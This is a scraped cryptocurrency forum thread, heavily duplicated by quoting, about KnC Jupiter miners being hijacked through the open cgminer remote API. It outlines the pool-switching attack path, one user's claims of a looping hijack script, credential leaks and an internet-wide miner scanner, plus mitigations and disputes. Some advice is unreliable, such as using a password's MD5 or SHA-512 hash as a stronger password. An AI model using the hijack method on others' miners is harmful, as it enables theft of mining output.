The KnC itselfs opens port 80 by default.
Some really dumb (or unknowing of course!) users also enable "ssh", and "CGMiner Remote Management Enabled" to make it even more easy to exploit them.

Can you image they can't check their miner on their iPad? Better to open all ports!! ;-)

[bitpop]

Op owes no one anything, he could have changed all your pools to his

Second who the hell opens the ports?

The KnC itselfs opens port 80 by default.
Some really dumb (or unknowing of course!) users also enable "ssh", and "CGMiner Remote Management Enabled" to make it even more easy to exploit them.

Can you image they can't check their miner on their iPad? Better to open all ports!! ;-)

Yeah but that port should never open to the wan

[mtbitcoin]

Just as a heads up .. I've had one these boxes compromised. I've now firewalled the entire box.

However, I suspect there is might a scheduled script to restart the miner in preconfigured intervals to point to a specific pool. Any ideas as to where I should be looking to see if there were any backdoors or schedule scripts/jobs?

Cheers

[steve15]

Just as a heads up .. I've had one these boxes compromised. I've now firewalled the entire box.

However, I suspect there is might a scheduled script to restart the miner in preconfigured intervals to point to a specific pool. Any ideas as to where I should be looking to see if there were any backdoors or schedule scripts/jobs?

Cheers

I did notice lots of miners already infected with a remote login called "nobody" in their configuration files.

It basically uses the same exploit, and totally took control over several miners.

It's mining at eligius, once I stumble upon that specific hacker again, I'll post his pool address.

Knc however, does not responds at all, let alone patch up their firmwares to protect the users.

Note, even my Jupiter has been hacked and infected by this eligius pool at specific times.

Execute code: userdel nobody in ssh.

Do not factory reset, as al these files are also infected.
It's not up to me to post details about how to remove this hacker, that's up to Knc, who clearly does not give a f*CK about it.

[steve15]

Edit, he just gained access to my miner again.

[mtbitcoin]

Edit, he just gained access to my miner again.

Cell phone screen shot of the hacker's pool

Do you have entire box firewalled? Or are there still specific ports open to the public. I've blocked of all incoming ports and so far so good

[steve15]

Edit, he just gained access to my miner again.

Cell phone screen shot of the hacker's pool

Do you have entire box firewalled? Or are there still specific ports open to the public. I've blocked of all incoming ports and so far so good

I let him gain access, on my turn, I'll abuse his details.
I'm waiting for his next login attempt now.

But there is a big issue with the miners.

Knc takes no action on this matter.

[steve15]

As far as I can see on my cell, it's a complete automated script. I think your firewall will be useless to this, since your box is already infected by it.

It will execute it's code again, keep checking your ssh en cgminer terminal closely.

Can you confirm it was the same elegius user?

[padrino]

I did notice lots of miners already infected with a remote login called "nobody" in their configuration files.

It basically uses the same exploit, and totally took control over several miners.

It's mining at eligius, once I stumble upon that specific hacker again, I'll post his pool address.

Knc however, does not responds at all, let alone patch up their firmwares to protect the users.

Note, even my Jupiter has been hacked and infected by this eligius pool at specific times.

Execute code: userdel nobody in ssh.

Do not factory reset, as al these files are also infected.
It's not up to me to post details about how to remove this hacker, that's up to Knc, who clearly does not give a f*CK about it.

nobody is a user and is there for running unprivileged items, standard Unix construct across distros.. If it's shell was changed from /nonexistant than one needs to worry about it but the user definitely exists on un-compromised boxes and is not an indication the box was compromised.. With that said I don't see it being used on any running binaries so it may not be needed on this box, just came as part of the busybox setup along with many of the other users..





Given some of the information kicking around this thread I decided to take a closer look at my Jupiters...

My Jupiters are completely behind a firewall so I can't say for sure but this conversation made me wonder what might be going on outside of a possible SSH or HTTP compromise... The basic security profile of the boxes is rather open but at it's heart it's no different than a Linux distro with a default username/password, Windows, etc. Although KnC should do more in their documentation to discuss changing things there are no actually vulnerabilities, just a weak security posture.

By default cgminer is open read/write for any address and in one of the recent firmware updates I think KnC enabled it by default..

Perhaps it's direct cgminer connections on the cgminer port?

Two options exist to mitigate:

- Disable cgminer remote management on the mining page.

- Another is a manual edit of the cgminer.conf file (manual mode) to disable world wide remote write access will take care of it, change   "api-allow": "W:0/0" to something more restrictive, for example W:192.168.0/24 if you only need access from 192.168.0.x addresses.

[Sophokles]

Steve is helping here.  He could have easily done this without posting anything and made a good amount of coin. Give the guy a break.

A tip is also welcome :-D

Post a tip address in your signature then  . You certainly did a big service to the (KnC-) mining community. Thumbs up from me.

[philipma1957]

 Well as annoyed as I was about the op's posting.  I will concede more then likely he is not the person that has crashed my groups 2 miners.

  Fact remains we have 1100gh dead in the water.  Since I don't run the gear and am A part owner I did direct our groups managers to this thread.

  We are still not hashing  I have to think our gear was hacked in the method described above.

 We were hacked  before this was posted so I can't say the op helped a hacker via this post to be able to attack us and my apology for my complaint against you. Since I just own a piece of the 1100gh pie I don't have full access to the records I can only say I have been told it hashes and nothing gets reported to our account.

https://bitcointalk.org/index.php?topic=334360.msg4310852#msg4310852


You know as fucking paranoid as BTC has made me I would not be surprised if a  KNC  employee did this.  Does not matter the fact remains that more then 1 jup   was attacked in more then 1 location.  oh well.

[kikikuku]

thank you !!!

[bitpop]

Well as annoyed as I was about the op's posting.  I will concede more then likely he is not the person that has crashed my groups 2 miners.

  Fact remains we have 1100gh dead in the water.  Since I don't run the gear and am A part owner I did direct our groups managers to this thread.

  We are still not hashing  I have to think our gear was hacked in the method described above.

 We were hacked  before this was posted so I can't say the op helped a hacker via this post to be able to attack us and my apology for my complaint against you. Since I just own a piece of the 1100gh pie I don't have full access to the records I can only say I have been told it hashes and nothing gets reported to our account.

https://bitcointalk.org/index.php?topic=334360.msg4310852#msg4310852


You know as fucking paranoid as BTC has made me I would not be surprised if a  KNC  employee did this.  Does not matter the fact remains that more then 1 jup   was attacked in more then 1 location.  oh well.

Your paranoia should lead you to the group leader. This thread was just a coincidence.

[steve15]

WARNING

I just found out that ANY miner with remote CGMINER enabled can be controlled remotely!!
I will NOT post how, but it seems that already lot's of hackers found out this exploit.

Nothing difficult, it uses a default cgminer script on your rig.

By default, enable cgminer options is activated on KnC rigs. In the cgminer configuration files, this is default to accept connections from any IP, worldwide.

I made a simple script, removing every user from the pools, adding my own pool, and set priority to 0.
This script loops every 2 seconds, making sure that nobody else mines on the rig except me.


Unvisible to the KnC user, he will only notice his pool does not add up.
I can even play safe, and make it schedule every X time.

Now, if i can make this script, so can anybody else!

!!! PLEASE DISABLE 'Enable cgminer remote' OPTION !!!

This can be used WITHOUT security, worldwide, by ANYONE !!

You have been warned...


Disclaimer: i did NOT use or abuse any rig except mine !!
Feel free to tip me for saving your multiple coins 

[padrino]

WARNING

I just found out that ANY miner with remote CGMINER enabled can be controlled remotely!!
I will NOT post how, but it seems that already lot's of hackers found out this exploit.

Umm, look at my post further up the thread from two days ago, I discuss this possibility and how to mitigate it..

[Phoenix1969]

Thanks alot for exploiting every KNC customer...   You went about this totally wrong.
although I appreciate the "heads up"... should have been given to Ckilovas and the KNC code boys when they return on the 7th
You literally just taught 1000 hackers how to steal....  great job   uuuuuggh

[ncs0ne]

This security issue concerns HTTP-Digest authentication via plain HTTP in general.
Even mentioned in the corresponding RFC somehow.

Digest Authentication offers no confidentiality protection beyond protecting the actual password. All of the rest of the request and response are available to an eavesdropper.

...

Many needs for secure HTTP transactions cannot be met by Digest Authentication. For those needs TLS or SHTTP are more appropriate protocols. In particular Digest authentication cannot be used for any transaction requiring confidentiality protection.

...

Both Digest and Basic Authentication are very much on the weak end of the security strength spectrum.

I'm wondering whether KnCMiner will reply at all to the OP, as their reseller portal and their forum doesn't make use of HTTPS as well.
It's not that they are not aware of it, it seems more like they do not want to spend time and money on this.

http://forum.kncminer.com/forum/resellers-affilicates/general-questions/761-https-for-the-forum
http://forum.kncminer.com/forum/resellers-affilicates/general-questions/23414-ssl-please

This one has been removed from the KnC forum as it seems, check post 12.1:
http://webcache.googleusercontent.com/search?q=cache:07UiAUGwVhYJ:forum.kncminer.com/forum/main-category/hardware/21601-saturn-hacked-btcguild-account-hacked-be-careful-guys


And therefore I do not expect a reaction or change.

Sam
KnC Administrator

    Join Date: Aug 2013
    Posts: 12

#5
9th September 2013, 10:04 AM
SSL is on its way

Hope is gone, as I send an email myself some weeks ago concerning this.

[padrino]

This security issue concerns HTTP-Digest authentication via plain HTTP in general.
Even mentioned in the corresponding RFC somehow.

Digest Authentication offers no confidentiality protection beyond protecting the actual password. All of the rest of the request and response are available to an eavesdropper.

...

Many needs for secure HTTP transactions cannot be met by Digest Authentication. For those needs TLS or SHTTP are more appropriate protocols. In particular Digest authentication cannot be used for any transaction requiring confidentiality protection.

I'm not sure what you are trying to imply here.. The use of HTTP digest and lack of HTTPS isn't a security issue by itself.

The data available in the web page does not require confidentiality, there isn't really any reason of value to protect it.

Digest provides protection against the password being read if someone is packet sniffing. Replay attacks are still possible if lighttpd does not use timestamps but even then someone would need to be in a position to packet sniff the segments between the user and the miner and also implement a replay attack. It's unlikely.

[ncs0ne]

At least for privacy reasons I'd prefer in general some data to be send encrypted.
Like my stats and worker-logins (in case of eligius the payout address).
In addition I prefer to be secure against skript-kiddy MITM attacks while I'm on travel.

Next gen of HTTP (2.0) is discussed to be encrypted by default as far as I know.
Why, there's no need to encrypt your traffic while you read the news or whatever.

[padrino]

A number of claims have been made on this thread about possible hacks, even the OP himself, although seemingly well intentioned doesn't seem to understand the basics of Linux security.. Odd given the claims by the OP of being a penetration tester with many years of experience but I suppose that is beside the point.

To summarize the situation there doesn't seem to be any actual vulnerabilities (as in software bugs) being exploited, rather people seem to be taking advantage of the weak security posture of the miners when the default configuration has not been changed.

Given the situation there are some things that can be done in code to improve the security posture of the systems out of the box but in lieu of that I'm providing the following recommendations on what any user can do to improve the security posture of the systems.

If you have changed the password for the miner it's unlikely there was an actual system compromise, more likely it's been remote access via cgminer like I mentioned in this thread a couple of days ago, and the OP apparently just picked up on.

If you suspect you have had system files on the miner changed it is best to reload the factory image on the system using an SD card, reference https://www.kncminer.com/pages/troubleshooting. If you had changed the password before putting it on the internet check the below options as this is unlikely and instead it was most likely access via cgminer itself.

First, the OP himself said he found a "nobody" user on his system and made claims he had been hacked, it is NOT an indication of a hack, that is a standard user used for running unprivileged items and is on the system.

Now onto the options for securing the system, some odd 2 second script like the OP suggests isn't needed, simply protect the system properly and it will stay secure.

1. Firewall the system from remote access, there is no reason any port on a KNC Miner needs to be accessible on the open internet, it works fine from behind a NAT on a home router, etc.. If you need remote access recommend a VPN solution as an option.

If you would like to limit exposure but still keep it online I suggest the following.

2. As discussed by an earlier post I made disable cgminer remote admin, or limit remote admin.. All things considered this seems to be the most likely access point. Definitely disable remote admin unless it's needed, if it is limit to to a specific set of IP addresses.

- Another is a manual edit of the cgminer.conf file (manual mode) to disable world wide remote write access will take care of it, change   "api-allow": "W:0/0" to something more restrictive, for example W:192.168.0/24 if you only need access from 192.168.0.x addresses.

[bitpop]

I don't see any issue, this is just fud. If you have a router you're safe. Tell me how the hell this miner opens ports when bitcoind with upnp can barely do it.

[steve15]

Padrino is right at most of the part.

The remote CGminer exploit can be executed without privileges to the system.
As my tests with a specific portscanner proof, the high portnumber cgminer uses by default is not always closed by the router.

My own router had the port 'filtered', but not closed. That's how i got my cgminer hacked.

Padrino, about the 'Nobody' user, like posted, i was looking via my smartphone in a quick hurry via SSH.
While i was loosing about 5Th/s to a hacker, please excuse me for posting reply to fast 

So, lesson learned here. DISABLE the remote CG management, and your safe.
Well, at least from the remote CG exploit...

[sickpig]

1. Firewall the system from remote access, there is no reason any port on a KNC Miner needs to be accessible on the open internet, it works fine from behind a NAT on a home router, etc.. If you need remote access recommend a VPN solution as an option.

This.

Never ever expose your miner directly to the internet.

Do not assign public IP to miner network interface. 

Even if you're using a private address for your miner do not trust your router fw/firewall.

Router firmwares are updated once in very long while, they reach support EOL quite rapidly. Taking this into account implies using your router port forwarding is moot. 

Use a bridge system between your router and your miner(s). Be it a linux hardened box or an OpenBSD one.

Set up a firewall on this machine that do both ingress/egress filtering. Set up a VPN service on this bridge box. Access to the miner only through this VPN service. 

If you do not have a static IP spend a few bucks a month for a VPS with a static IP address and use n2n (a layer two p2p VPN) to mimic a more classic VPN set up.

[MiningBuddy]

When I used to mine I never had a miner exposed to the internet, instead if I wanted to do any remote work I would SSH into a laptop that was open to the internet and on my miners network then SSH into my miners or however they were managed. This is fine as long as the bridge (laptop) is secure in this instance.

[steve15]

KnC released a new firmware with all my points emailed to them taken into account.

THANK YOU KNC

However....

The new firmware has a HUGE security flaw. BUT...

Since KnC does not even thanks me for writing a detailed report, consuming several hours of my time, it's not worth it to me to write another one.
They DID implent every bugfix and security improvement i emailed them, and now taking credit for it... Lame ass f*ckers!

If the script kiddies find out this new (ridiculous) bug in the miners, rest assured that many rigs will be taken over.

We have a new firmware for you today, version 0.99.2 firmware which can be downloaded from our firmware page here: https://www.kncminer.com/pages/firmware The firmware contains the following changes.
New features:

- Initial splash screen on first use now asks the user to specify a new administrator user name and password and also a enter a list of trusted addresses allowed to manage the miner. (Please note that by entering trusted addresses incorrectly you could block your access to the miner. The only way to regain access would be to perform a hard reset by pressing the button on the front of the miner 5 times, waiting 5 seconds and pressing another 5 times, as described in the user manual)

There you go, just as i suggested it.

- Miner management can be configured to allow access for trusted addresses only. The trusted addresses should be specified by using space separated addresses from which the miner is allowed to be accessed via HTTP and SSH.

That's about time!!

- List of trusted management addresses can be changed on the "Network" page of the miner interface.

- On the "Mining" page there is now a setting which allows to the user to specify which addresses can access the miner's API interface. 

- Added support for BFGMiner, which is now selectable from the "Mining" page of the interface.

Thanks,
KnC team

[padrino]

Since KnC does not even thanks me for writing a detailed report, consuming several hours of my time, it's not worth it to me to write another one.
They DID implent every bugfix and security improvement i emailed them, and now taking credit for it... Lame ass f*ckers!

If the script kiddies find out this new (ridiculous) bug in the miners, rest assured that many rigs will be taken over.

Sure they could have said something and should have, but are sure it was in fact you and not someone else that emailed them before you but followed industry best practice and didn't make a post on a public forum with a lot of the technical details?

Of course this reply continues to destroy any creditability with respect to the massive amount of professional experience you say you have. As you continue this campaign I doubt more and more you were genuine to begin with and were at best a fame seeker, at worse malicious..

[arousedrhino]

KnC released a new firmware with all my points emailed to them taken into account.

THANK YOU KNC

However....

The new firmware has a HUGE security flaw. BUT...

Since KnC does not even thanks me for writing a detailed report, consuming several hours of my time, it's not worth it to me to write another one.
They DID implent every bugfix and security improvement i emailed them, and now taking credit for it... Lame ass f*ckers!

If the script kiddies find out this new (ridiculous) bug in the miners, rest assured that many rigs will be taken over.

We have a new firmware for you today, version 0.99.2 firmware which can be downloaded from our firmware page here: https://www.kncminer.com/pages/firmware The firmware contains the following changes.
New features:

- Initial splash screen on first use now asks the user to specify a new administrator user name and password and also a enter a list of trusted addresses allowed to manage the miner. (Please note that by entering trusted addresses incorrectly you could block your access to the miner. The only way to regain access would be to perform a hard reset by pressing the button on the front of the miner 5 times, waiting 5 seconds and pressing another 5 times, as described in the user manual)

There you go, just as i suggested it.

- Miner management can be configured to allow access for trusted addresses only. The trusted addresses should be specified by using space separated addresses from which the miner is allowed to be accessed via HTTP and SSH.

That's about time!!

- List of trusted management addresses can be changed on the "Network" page of the miner interface.

- On the "Mining" page there is now a setting which allows to the user to specify which addresses can access the miner's API interface.  

- Added support for BFGMiner, which is now selectable from the "Mining" page of the interface.

Thanks,
KnC team

Steve,

Would this new bug you found be a problem for only public facing miners or all miners?

Just wondering if an miner on a private network with all the api's turned off for cgminer would be vulnerable to such an attack.

Edit: Oh and im on .99.1-t.

Thanks.

KNC will never admit the security problem because that would legally make them potentially liable for loses suffered because of the breach. They could have at least sent ya a 1 BTC or something for your effort. Time is money and if they don't want to pay you anything its not worth your time.

[bitpop]

This guy is abrasive like I am

[noext]

how bypass the http digest ? i want try this hack on my knc

[steve15]

KnC released a new firmware with all my points emailed to them taken into account.

THANK YOU KNC

However....

The new firmware has a HUGE security flaw. BUT...

Since KnC does not even thanks me for writing a detailed report, consuming several hours of my time, it's not worth it to me to write another one.
They DID implent every bugfix and security improvement i emailed them, and now taking credit for it... Lame ass f*ckers!

If the script kiddies find out this new (ridiculous) bug in the miners, rest assured that many rigs will be taken over.

We have a new firmware for you today, version 0.99.2 firmware which can be downloaded from our firmware page here: https://www.kncminer.com/pages/firmware The firmware contains the following changes.
New features:

- Initial splash screen on first use now asks the user to specify a new administrator user name and password and also a enter a list of trusted addresses allowed to manage the miner. (Please note that by entering trusted addresses incorrectly you could block your access to the miner. The only way to regain access would be to perform a hard reset by pressing the button on the front of the miner 5 times, waiting 5 seconds and pressing another 5 times, as described in the user manual)

There you go, just as i suggested it.

- Miner management can be configured to allow access for trusted addresses only. The trusted addresses should be specified by using space separated addresses from which the miner is allowed to be accessed via HTTP and SSH.

That's about time!!

- List of trusted management addresses can be changed on the "Network" page of the miner interface.

- On the "Mining" page there is now a setting which allows to the user to specify which addresses can access the miner's API interface.  

- Added support for BFGMiner, which is now selectable from the "Mining" page of the interface.

Thanks,
KnC team

Steve,

Would this new bug you found be a problem for only public facing miners or all miners?

Just wondering if an miner on a private network with all the api's turned off for cgminer would be vulnerable to such an attack.

Edit: Oh and im on .99.1-t.

Thanks.

KNC will never admit the security problem because that would legally make them potentially liable for loses suffered because of the breach. They could have at least sent ya a 1 BTC or something for your effort. Time is money and if they don't want to pay you anything its not worth your time.

Well, without trying to reveal to much details, the bugs in the newest firmware are major issues.

I found 3 critical exposures of user credentials in a very simple way.

1) This has something to do with a parameter that is not sanitized, making you read protected files (userfiles?)
2) Userfile is readable without login in to the system webinterface
3) Cross Site Scripting "prompt" methods are able to be executed

To answer your question, your miner itself will be well shielded from outside access. However, the biggest problem once again comes down to the user.
You may protect your miner with all available options, but what about your other hardware that is connected to your internet?

Almost every available router has at least one working exploit available out there on the internet. Piece of cake to login/hack/crack your router, and your miner is accessible.

The most recent problems are however using smart devices on the same network. For example, a smart TV, a WiFi printer, a NAS server, ....
Same here, almost all these devices have one or more security flaws. These are also known to be "less" secured by the user itself.

Once again, just by accessing these devices, your miner can be at risk.

Now, dont be a fool thinking your miner IP is unknown to the internet also. Even from behind a router, your end ip address gets submitted with every share on the internet....
There are many many huge lists available on the net with miner IP addresses. And then it's just a matter of scanning this specific network range for weak devices.

A very good solution comes from SickPig:

Never ever expose your miner directly to the internet.

Do not assign public IP to miner network interface. 

Even if you're using a private address for your miner do not trust your router fw/firewall.

Router firmwares are updated once in very long while, they reach support EOL quite rapidly. Taking this into account implies using your router port forwarding is moot. 

Use a bridge system between your router and your miner(s). Be it a linux hardened box or an OpenBSD one.

Set up a firewall on this machine that do both ingress/egress filtering. Set up a VPN service on this bridge box. Access to the miner only through this VPN service. 

If you do not have a static IP spend a few bucks a month for a VPS with a static IP address and use n2n (a layer two p2p VPN) (http://www.ntop.org/products/n2n/) to mimic a more classic VPN set up.

Keep your eyes open, and change your passwords of ALL devices in your network every now and then.
Dont be scared to use long passwords, for exmple, you can SHA-512 hash your current password.

Your basic password known as for example

"password"

then becomes

"b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976e c049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86"

way more secure against bruteforce/dictionary hacking methods.

If you are not allowed this much characters, take a simple MD5 encryption of your current password.

[U1TRA_L0RD]

Maybe im not so sure about getting a Jupiter now, Until this vulnerability gets fixed with a new firmware update.

[steve15]

Since KnC patched up, i'm going to compile my injection application and release it to the public.

However, some restrictions will apply for general safety!!

-- My application will be limited to ONLY scan your OWN subnet or IP range (127.0.x.x and 192.168.x.x).

-- This application will act as proof of concept, no changes to the miner itself can be made.

-- The newest firmware bug will spill out your <super secret> login without authentication

The reason i will release the application is for miners to test their own miners against the exploits in the firmware.

Stay tuned, i will compile all this into a nice running GUI by sunday evening 


NOTE: STOP asking me in PM about the full exploit in the new firmware. This will not be revealed !

[palawan]

I'm extremely addicted at looking at my Antminer S1 miner from anywhere, lol.  I have to be able to connect to it from anywhere.  I got a hotspot on my phone...

I still have the default root password of root on my S1, however:

• 1. My ddwrt router can only be managed remotely from 1 IP address
• 2. My Antminer S1 can only be managed by 1 IP address
• 3. My Antminer S1 can only ssh'ed to by 1 IP address
• 4. Ports 80, 443 or 22 are not the ports to connect to

Amazon EC2 micro instance for free (I think it's still free).  I have paid about $1/month for the past 3 months and it's only because I've exceeded the data transfer quota.  Set one up.  Install OpenVPN on it.  Install PPTP VPN on it (for tablets and cell phones).  This is your personal VPN server and you don't need to pay nobody  (pun intended).  You can use this when using unsecured public wifi.

Choose ubuntu instance.  apt-get the necesary packages. Guides are out there.  EC2 requires opening the necessary ports as well as on the Ubuntu hosts.  If I somehow find the time and feeling energetic I would write a detailed  step-by-step and post it on a webpage, but I doubt it will be anytime soon...

[Acejam]

Since KnC patched up, i'm going to compile my injection application and release it to the public.

However, some restrictions will apply for general safety!!

-- My application will be limited to ONLY scan your OWN subnet or IP range (127.0.x.x and 192.168.x.x).

-- This application will act as proof of concept, no changes to the miner itself can be made.

-- The newest firmware bug will spill out your <super secret> login without authentication

The reason i will release the application is for miners to test their own miners against the exploits in the firmware.

Stay tuned, i will compile all this into a nice running GUI by sunday evening 


NOTE: STOP asking me in PM about the full exploit in the new firmware. This will not be revealed !

Needs to be open source. Otherwise you will be stealin our wallet dot dat's!

 

[Walking Glitch]

You guys need to quit port forwarding/DMZing everything to the internet so blindly. One thing that would have completely prevented your kncminer from being a target is setting up a VPN on a computer inside your network, and forward only the necessary port to connect to it. Then using the VPN session, log into your miner. Then no matter what bug is in kncminers firmware, if it's not receiving inbound connections from the internet, it is unhackable. (Unless of course one of your own machines are compromised.)

[ici_lemmy]

Stay tuned, i will compile all this into a nice running GUI by sunday evening 

Sunday You mean next sunday

[bitpop]

Yes awaiting Sunday

[steve15]

Hi all,

I'm sorry, but at the moment I have another priority task :-)
I will publish it later this week!!

About the open source demand, due to the nature of this application, of course, for general safety open source will be impossible.

There is no need for the entire world to be able to exploit mining rigs!

You will only be allowed to scan your own network ;-)

There will also be an option that scans your entire network for weak or exposed devices, showing whether there is a known exploit available or not, like your router etc.

Please stay tuned!

[Walking Glitch]

If you're not a script kiddie, you would be able to figure out how to trick his app into scanning everything. Keep that in mind when you release it steve.

[arousedrhino]

Maybe im not so sure about getting a Jupiter now, Until this vulnerability gets fixed with a new firmware update.

Where were you going to buy one from anyways?

[steve15]

If you're not a script kiddie, you would be able to figure out how to trick his app into scanning everything. Keep that in mind when you release it steve.

I had this issue on my mind already. I have only one option to prevent this from happening;

I obfuscate my code, and crypt the executable, making the code non reversible, undebugable, thus preventing to 'trick' it and use it for evil purposes.

But here's the bit but part:

When crypting an executable, 4/35 virusscanners will give me a false positive because of certain things, specific the Cgminer DLL and the encrypted source.
Yes, most of us know that cgminer itself is considered a 'trojan', using bitdefender. (just download it and try yourself  )

But i can not put a file for download that gives false positive AV alert out here, the entire forum will scream and shout that i'm a scammer or so.
Even if it is only 4/35 virusscanners giving false positives.

So, can i make my code so closed that abusing it becomes impossible?

Yes, but at the risk of being blamed and shamed as a scammer for putting a (possible) false positive AV scan file up.

So do i prefer to be named a scammer, or do i prefer to prevent massive scale abuse of the systems?

Maybe, i'll just put it up as-is, warning about the false positives, and hope people trust me.
On the other hand, i think the chances of someone debugging, or reverse engineering my application, are way smaller than someone calling me a scammer.

So, we'll see !

[nuno12345]

People debugging your code will probably happen.
If the file itself its well encrypted and cant be debugged probably you can still sniff the network traffic and see how its working.

Also I dont like this closed source, you know it all or tipping attempt thing, so here it is what I have found based on your posts only, to everyone not just KnC.

You said to scan the internet using some kind of tool, later an user posted some data from shodanq(with shodanq you can easily find those subnet addresses with dozens of miners), you said it was a bad tool, so your probably speaking about zmap or masscan (scan the internet in 1 hour).

About the digest bypass, im not sure but you gave some clues like XSS, so probably some new file (check new commits at github) is vulnerable to something like this

The cgminer vulnerability its not a vulnerability since there is no security to break, port 4028 open in router+api-listen+api-allow=dumbest thing, since everyone can easily monitor your miners or even change pools with switchpool().


Said this, sorry admin for the content of the reply, what I really want to talk about is how to fix it/patch it.

Instead of posting a PoC why dont you post a fix, temporary fix, patch or whatever, way more usefull and no one will call you a scammer

[sssubito]

Posting the fix won't help much as this will reveal most of the vital details to be abused as an exploit.

The true shame is the completely unprofessional behavior of KnC. steve15 did invest some work, he uses Jupiters for own mining. Even if someone else emailed details to KnC earlier than him, KnC should respond in a way more professional way than they did. They should take the opportunity to speak with steve15 and use his work and details for some well invested refund and exchange for knowledge that KnC apparently lacks or doesn't care about.

I don't own KnC hardware but if I were to own a single piece I would constantly shout and scream at KnC. So many companies care a shit on security and their customers, expose them in a way which is unbelievable and KnC is just one of them. How lame is this!

OK, the customer too has a responsibility, sure. Mining isn't child's play, you should exactly know what you are doing and how you setup your gear. Seems like greed makes miners sooo blinded.


@KnC: Act more responsible and professional, your customers deserve it!

[Gator-hex]

PLEASE USE A ROUTER INSTEAD OF DIRECT INTERNET ACCESS !!!

Anyone who puts a mining machine on their WAN instead of their LAN will be hacked. Simple as.

[steve15]

You said to scan the internet using some kind of tool, later an user posted some data from shodanq(with shodanq you can easily find those subnet addresses with dozens of miners), you said it was a bad tool, so your probably speaking about zmap or masscan (scan the internet in 1 hour).

zmap, masscan, or any other scanner just scans ports. I have a homemade tool that scans the entire net for "some" responses, that expose every miner online (knc, Ant, BFL, ....) in about 4 hour

Since i made this post, no single ShodanHQ found miner is vulnerable since then. Job well done i guess!
But then, Shodan is not a great tool or scanner. It just finds miners "by accident", not intentioned. It only has about 140 results, i get over 8000 results...

About the digest bypass, im not sure but you gave some clues like XSS, so probably some new file (check new commits at github) is vulnerable to something like this

XSS has little to do with the latest exploit. I just stated that their new firmware is vulnerable to XSS exploits.

The cgminer vulnerability its not a vulnerability since there is no security to break, port 4028 open in router+api-listen+api-allow=dumbest thing, since everyone can easily monitor your miners or even change pools with switchpool().

I agree. But that is KnC's default configuration, so as for many many many online miners

Said this, sorry admin for the content of the reply, what I really want to talk about is how to fix it/patch it.

Instead of posting a PoC why dont you post a fix, temporary fix, patch or whatever, way more usefull and no one will call you a scammer

The 'fix' has been submitted to KnC together with my detailed report. I even wrote an entire new firmware for them. They took it, modified it for some reason, and published it online.
Because they modified it, it now has a critical exploit, spilling out the username + pwd without loggin in first.

So, i patched up their FW, gave a temporary fix by posting this (shows in the Shodan results, before post = 84 exploitable, now 0), and my PoC is far more than just a PoC
It will also scan your entire network, hooked up to the Metasploit DB for showing your network weak spots.

And, if you dont like closed source, then don't download it. It's not about my safety, but the safety of an entire community.

[steve15]

Posting the fix won't help much as this will reveal most of the vital details to be abused as an exploit.

The true shame is the completely unprofessional behavior of KnC. steve15 did invest some work, he uses Jupiters for own mining. Even if someone else emailed details to KnC earlier than him, KnC should respond in a way more professional way than they did. They should take the opportunity to speak with steve15 and use his work and details for some well invested refund and exchange for knowledge that KnC apparently lacks or doesn't care about.

I don't own KnC hardware but if I were to own a single piece I would constantly shout and scream at KnC. So many companies care a shit on security and their customers, expose them in a way which is unbelievable and KnC is just one of them. How lame is this!

OK, the customer too has a responsibility, sure. Mining isn't child's play, you should exactly know what you are doing and how you setup your gear. Seems like greed makes miners sooo blinded.


@KnC: Act more responsible and professional, your customers deserve it!

Thank you sir!

KnC used my custom firmware and released it as their own a couple of days after submitting my work to them.
I dont need credit or so, but at least a 'thank you' would show some respect.

But the bitter truth is that most company's only care about your money.

[sssubito]

KnC used my custom firmware and released it as their own a couple of days after submitting my work to them.
I dont need credit or so, but at least a 'thank you' would show some respect.

But the bitter truth is that most company's only care about your money.

Now that's pretty badass from KnC. Lame money hogs...

There is one strong argument a customer always has: let your wallet speak out loud! Every company understands this well. Unfortunately it's only effective if used in some form of customer's consensus, which is apparently the weak point. Being consequent is quite hard, especially when the market and competition are small.

[padrino]

KnC used my custom firmware and released it as their own a couple of days after submitting my work to them.
I dont need credit or so, but at least a 'thank you' would show some respect.

But the bitter truth is that most company's only care about your money.

Now that's pretty badass from KnC. Lame money hogs...

There is one strong argument a customer always has: let your wallet speak out loud! Every company understands this well. Unfortunately it's only effective if used in some form of customer's consensus, which is apparently the weak point. Being consequent is quite hard, especially when the market and competition are small.

Way to get sucked into this.. steve15 may have done some good but this is the same guy telling everyone a "nobody" user was a sign the system was hacked.. Point being even the most basic security concepts were beyond him even though he is a claimed professional pen tester.

I initially gave credit as well but while his core point was quite valid and he did stumble onto a weakness in the system the demonstrated lack of understanding behind some key fundamentals puts many of the unsubstantiated claims to question given he stated over and over again he is a professional pen tester.

Now you are using unverified statement after unverified statement as a set of facts and jumping to conclusions which are completely unsubstantiated..

[steve15]

Way to get sucked into this.. steve15 may have done some good but this is the same guy telling everyone a "nobody" user was a sign the system was hacked.. Point being even the most basic security concepts were beyond him even though he is a claimed professional pen tester.

I initially gave credit as well but while his core point was quite valid and he did stumble onto a weakness in the system the demonstrated lack of understanding behind some key fundamentals puts many of the unsubstantiated claims to question given he stated over and over again he is a professional pen tester.

Now you are using unverified statement after unverified statement as a set of facts and jumping to conclusions which are completely unsubstantiated..

I think you need to stop blaming for for getting 5 Th/s hacked, and me, while driving, looking at my 4" cellphone screen trough SSH who was logged in at that exact moment, and in between that, posting details here on the forum...

So yes, i mistaked the nodoby user at that time.

[ici_lemmy]

I found 3 critical exposures of user credentials in a very simple way.

1) This has something to do with a parameter that is not sanitized, making you read protected files (userfiles?)
2) Userfile is readable without login in to the system webinterface
3) Cross Site Scripting "prompt" methods are able to be executed

So you found a 0day in lighttpd mod_auth ? I don't think so...
I can be wrong but considering your posts in this thread (password bruteforce, nobody user, your miner directly connected to WAN, etc..), until you post something that can prove what you are saying, I can't take you seriously !

zmap, masscan, or any other scanner just scans ports. I have a homemade tool that scans the entire net for "some" responses, that expose every miner online (knc, Ant, BFL, ....) in about 4 hour

Again, I can be wrong but the only shared thing i can think of is cgminer. It doesn't open port for listening so again, i can't take you seriously...


I'm sorry but, to my eyes, you're are no longer credible...

[steve15]

I found 3 critical exposures of user credentials in a very simple way.

1) This has something to do with a parameter that is not sanitized, making you read protected files (userfiles?)
2) Userfile is readable without login in to the system webinterface
3) Cross Site Scripting "prompt" methods are able to be executed

So you found a 0day in lighttpd mod_auth ? I don't think so...
I can be wrong but considering your posts in this thread (password bruteforce, nobody user, your miner directly connected to WAN, etc..), until you post something that can prove what you are saying, I can't take you seriously !

